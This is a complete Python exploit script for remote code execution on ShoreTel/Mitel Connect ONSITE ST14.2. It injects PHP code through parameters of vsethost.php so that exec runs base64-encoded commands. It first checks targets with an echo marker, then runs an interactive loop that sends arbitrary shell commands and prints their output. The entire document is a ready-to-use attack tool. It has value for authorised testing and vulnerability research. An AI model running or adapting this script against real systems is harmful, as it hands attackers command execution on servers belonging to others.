ShoreTel/Mitel Connect ONSITE ST14.2 RCE

1. # ShoreTel/Mitel Connect ONSITE ST14.2 Remote Code Execution
2. # https://blog.eviltwin.id/2021/06/shoretel-mitel-connect-on-site-st142-rce.html
3.  
4. import base64, requests, sys
5. import readline
6. i = "\033[1;32m"
7. m = "\033[1;31m"
8. p = "\033[1;37m"
9. k = "\033[1;33m"
10. def build_shoretel(cmd):
11.     obj = {
12.         "hostId": "system",
13.         "keyCode": "base64_decode",
14.         "meetingType": "{${gKeyCode}($gSessionDir)}",
15.         "sessionDir": base64.b64encode(bytes(cmd, "utf-8")).decode("ascii"),
16.         "swfServer": "{${gHostID}($gMeetingType)}",
17.         "server": "exec",
18.         "dir": "/usr/share/apache2/htdocs/wc2_deploy/scripts/"
19.     }
20.     return obj
21.  
22. def exploit():
23.     if len(sys.argv) < 2: sys.exit("Usage: python evil_rce.py http://target.com")
24.     url = sys.argv[1]
25.     c = requests.get(url+"/scripts/vsethost.php",params = build_shoretel("echo bWVua3JlcDEzMzcK"))
26.     if requests.get(url+"/scripts/vmhost.php").text.strip() == "bWVua3JlcDEzMzcK":
27.         print(p + sys.argv[1] + k + " ->" + i + " Vuln!")
28.         while True:
29.             cmd = input(p + "Command: ")
30.             requests.get(url+"/scripts/vsethost.php", params = build_shoretel(cmd))
31.             c = requests.get(url+"/scripts/vmhost.php")
32.             print(c.text if c.text != "" else "No output")
33.     else:
34.         print(p + sys.argv[1] + k + " ->" + m + " Not vuln :(")
35. exploit()
36.